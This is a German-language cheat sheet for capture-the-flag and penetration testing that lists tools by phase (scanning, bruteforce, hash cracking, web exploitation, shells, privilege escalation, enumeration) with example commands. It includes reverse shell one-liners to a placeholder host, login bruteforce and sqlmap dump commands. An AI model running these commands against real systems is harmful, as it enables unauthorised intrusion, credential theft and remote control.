🔎
Recon & Scanning
Rustscan
👉 Wann nutzen?
- Ganz am Anfang eines CTFs (schneller Portscan)
⚙️ Was kann das Tool?
- Sehr schneller Port-Scanner
- Übergabe an Nmap möglich
💻 Commands
rustscan -a <IP>
rustscan -a <IP> --ulimit 5000
rustscan -a <IP> -- -sC -sV
✅ Alternativen
- Nmap
- Masscan
Nmap
👉 Wann nutzen?
- Nach Rustscan
- Für detaillierte Analyse
⚙️ Was kann das Tool?
- Service Detection
- OS Detection
- Scripts (NSE)
💻 Commands
nmap -sC -sV <IP>
nmap -p- <IP>
nmap -A <IP>
nmap --script vuln <IP>
✅ Alternativen
- Rustscan
- Masscan
Masscan
👉 Wann nutzen?
- Große Netzwerke
- Extrem schneller Scan nötig
⚙️ Was kann das Tool?
- Scannt extrem schnell Ports
- Ideal für /16 oder größere Netze
💻 Commands
masscan -p1-65535 <IP> --rate=1000
masscan -p80,443 <IP>
masscan -p22 <IP> --rate=5000
✅ Alternativen
- Rustscan
- Nmap
🔑
Bruteforce
Hydra
👉 Wann nutzen?
- Login Bruteforce (SSH, FTP, HTTP)
⚙️ Was kann das Tool?
- Multi-Protokoll Bruteforce
- Unterstützt SSH, FTP, HTTP, SMB und mehr
💻 Commands
hydra -l admin -P rockyou.txt <IP> ssh
hydra -L users.txt -P passwords.txt <IP> ftp
hydra -l admin -P rockyou.txt <IP> http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
✅ Alternativen
- Medusa
- Ncrack
Medusa
👉 Wann nutzen?
- Große Wordlists
- Stabilere Alternative zu Hydra
⚙️ Was kann das Tool?
- Schneller paralleler Bruteforce
- Unterstützt viele Protokolle
💻 Commands
medusa -h <IP> -u admin -P rockyou.txt -M ssh
medusa -h <IP> -U users.txt -P passwords.txt -M ftp
medusa -h <IP> -u admin -P rockyou.txt -M http
✅ Alternativen
- Hydra
- Ncrack
Ncrack
👉 Wann nutzen?
- Viele Hosts gleichzeitig
⚙️ Was kann das Tool?
- Sehr effizient bei Netzwerk-Angriffen
- Nmap-Syntax kompatibel
💻 Commands
ncrack -p ssh <IP> -u admin -P rockyou.txt
ncrack -p ftp <IP> --user admin --pass wordlist.txt
ncrack -p ssh,ftp <IP>
✅ Alternativen
- Hydra
- Medusa
Burp Suite
👉 Wann nutzen?
- Web Login Analyse
- Komplexe Authentifizierung
⚙️ Was kann das Tool?
- Requests abfangen & manipulieren
- Bruteforce mit Intruder
- Aktiver & passiver Scanner
💻 Commands
1. Proxy aktivieren → Request abfangen
2. Send to Intruder → Payload § setzen
3. Wordlist laden → Attack → Antworten vergleichen
✅ Alternativen
- OWASP ZAP
- FFUF
🔓
Password Cracking
John the Ripper
👉 Wann nutzen?
- Offline Hashes cracken
⚙️ Was kann das Tool?
- Dictionary + Rule Attacks
- Viele Hash-Typen unterstützt
💻 Commands
john hash.txt
john --wordlist=rockyou.txt hash.txt
john --show hash.txt
✅ Alternativen
- Hashcat (GPU, schneller)
Hashcat
👉 Wann nutzen?
- Große Hashes / GPU verfügbar
⚙️ Was kann das Tool?
- Extrem schneller GPU-Cracker
- 300+ Hash-Typen
💻 Commands
hashcat -m 0 hash.txt rockyou.txt
hashcat -a 3 -m 0 hash.txt ?a?a?a?a
hashcat --show hash.txt
✅ Alternativen
- John the Ripper
🌐
Web Exploitation
SQLMap
👉 Wann nutzen?
- SQL Injection vermutet
⚙️ Was kann das Tool?
- Automatisiert SQLi Erkennung
- Datenbank-Dump
- Shell-Zugriff möglich
💻 Commands
sqlmap -u "<URL>" --dbs
sqlmap -u "<URL>" --tables
sqlmap -u "<URL>" --dump
✅ Alternativen
- Burp Suite
- Manual Testing
Gobuster
👉 Wann nutzen?
- Verzeichnisse finden
⚙️ Was kann das Tool?
- Directory & File Bruteforce
- DNS Subdomain Enumeration
💻 Commands
gobuster dir -u http://<IP> -w wordlist.txt
gobuster dir -u http://<IP> -w wordlist.txt -x php,html
gobuster dns -d domain.com -w wordlist.txt
✅ Alternativen
- FFUF
- Dirsearch
FFUF
👉 Wann nutzen?
- Schnelles Web Fuzzing
⚙️ Was kann das Tool?
- Parameter & Directory Bruteforce
- Sehr flexibel filterbar
💻 Commands
ffuf -u http://<IP>/FUZZ -w wordlist.txt
ffuf -u http://<IP>/FUZZ -w wordlist.txt -fc 404
ffuf -u http://<IP>/index.php?FUZZ=test -w params.txt
✅ Alternativen
- Gobuster
- Burp Intruder
Nikto
👉 Wann nutzen?
- Schneller Webscan
⚙️ Was kann das Tool?
- Findet bekannte Schwachstellen
- Checks für Fehlkonfigurationen
💻 Commands
nikto -h http://<IP>
nikto -h <IP> -p 80,443
nikto -h http://<IP> -Tuning x
✅ Alternativen
- Nmap Scripts
- Burp
🖧
Shells & Networking
Netcat
👉 Wann nutzen?
- Reverse Shells
- Debugging
⚙️ Was kann das Tool?
- TCP/UDP Kommunikation
- Listener für Shells
- File Transfer
💻 Commands
nc -lvnp 4444
nc <IP> 4444
nc -e /bin/bash <IP> 4444
✅ Alternativen
- Socat
Socat
👉 Wann nutzen?
- Stabilere Shells als Netcat
⚙️ Was kann das Tool?
- Erweiterte Netzwerkverbindungen
- Vollständige TTY möglich
💻 Commands
socat TCP-LISTEN:4444 EXEC:/bin/bash
socat TCP:<IP>:4444 EXEC:/bin/bash
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
✅ Alternativen
- Netcat
Reverse Shell
👉 Wann nutzen?
- Nach erfolgreichem Exploit
⚙️ Was kann das Tool?
- Verbindung zurück zum Angreifer
- Umgeht Firewalls (outbound)
💻 Commands
bash -i >& /dev/tcp/<IP>/4444 0>&1
python3 -c 'import pty;pty.spawn("/bin/bash")'
✅ Alternativen
- revshells.com (Generator)
- Metasploit meterpreter
🧠
Privilege Escalation
LinPEAS
👉 Wann nutzen?
- Direkt nach initialer Shell
⚙️ Was kann das Tool?
- Automatische PrivEsc Checks
- SUID, Cron, Sudo, Capabilities
💻 Commands
./linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee output.txt
✅ Alternativen
- LinEnum
- linux-smart-enumeration (lse.sh)
Sudo / SUID
👉 Wann nutzen?
- Immer direkt nach Shell
⚙️ Was kann das Tool?
- Sudo-Rechte prüfen
- SUID-Binaries → GTFOBins
💻 Commands
sudo -l
find / -perm -4000 -type f 2>/dev/null
cat /etc/crontab
✅ Alternativen
- GTFOBins (gtfobins.github.io)
📂
File Transfer
Python HTTP Server
👉 Wann nutzen?
- Dateien auf Zielsystem übertragen
⚙️ Was kann das Tool?
- Lokaler Webserver in einer Zeile
- Dateien per wget/curl abrufbar
💻 Commands
python3 -m http.server 8000
python3 -m http.server 80
python3 -m http.server --bind 0.0.0.0 8000
✅ Alternativen
- Netcat
- SCP
Wget / Curl
👉 Wann nutzen?
- Dateien herunterladen
⚙️ Was kann das Tool?
- Dateien von HTTP/FTP laden
- Curl für HTTP-Requests
💻 Commands
wget http://<IP>:8000/file
curl http://<IP>:8000/file -o file
curl -O http://<IP>:8000/file
✅ Alternativen
- FTP
- SCP
🔍
Enumeration Services
SMB
👉 Wann nutzen?
- Port 445 offen
⚙️ Was kann das Tool?
- Shares anzeigen
- Dateien lesen/schreiben
- Lateral Movement
💻 Commands
smbclient -L //<IP> -N
smbmap -H <IP>
enum4linux <IP>
✅ Alternativen
- CrackMapExec
SNMP
👉 Wann nutzen?
- Port 161 offen
⚙️ Was kann das Tool?
- System-Infos auslesen
- Oft unterschätzt → viele Infos
💻 Commands
snmpwalk -c public -v1 <IP>
snmp-check <IP>
onesixtyone -c community.txt <IP>
✅ Alternativen
- Nmap SNMP Scripts
🧰
Exploitation
Searchsploit
👉 Wann nutzen?
- Nach Nmap Scan
- Exploit suchen
⚙️ Was kann das Tool?
- Lokale Exploit-DB Suche
- Offline nutzbar
💻 Commands
searchsploit apache
searchsploit -x exploit
searchsploit -m exploit
✅ Alternativen
- Exploit-DB (online)
Metasploit
👉 Wann nutzen?
- Wenn Exploit existiert
⚙️ Was kann das Tool?
- Exploit Framework
- Meterpreter Sessions
- Post-Exploitation
💻 Commands
msfconsole
search <exploit>
use exploit/...
set RHOSTS <IP> && run
✅ Alternativen
- Manual Exploit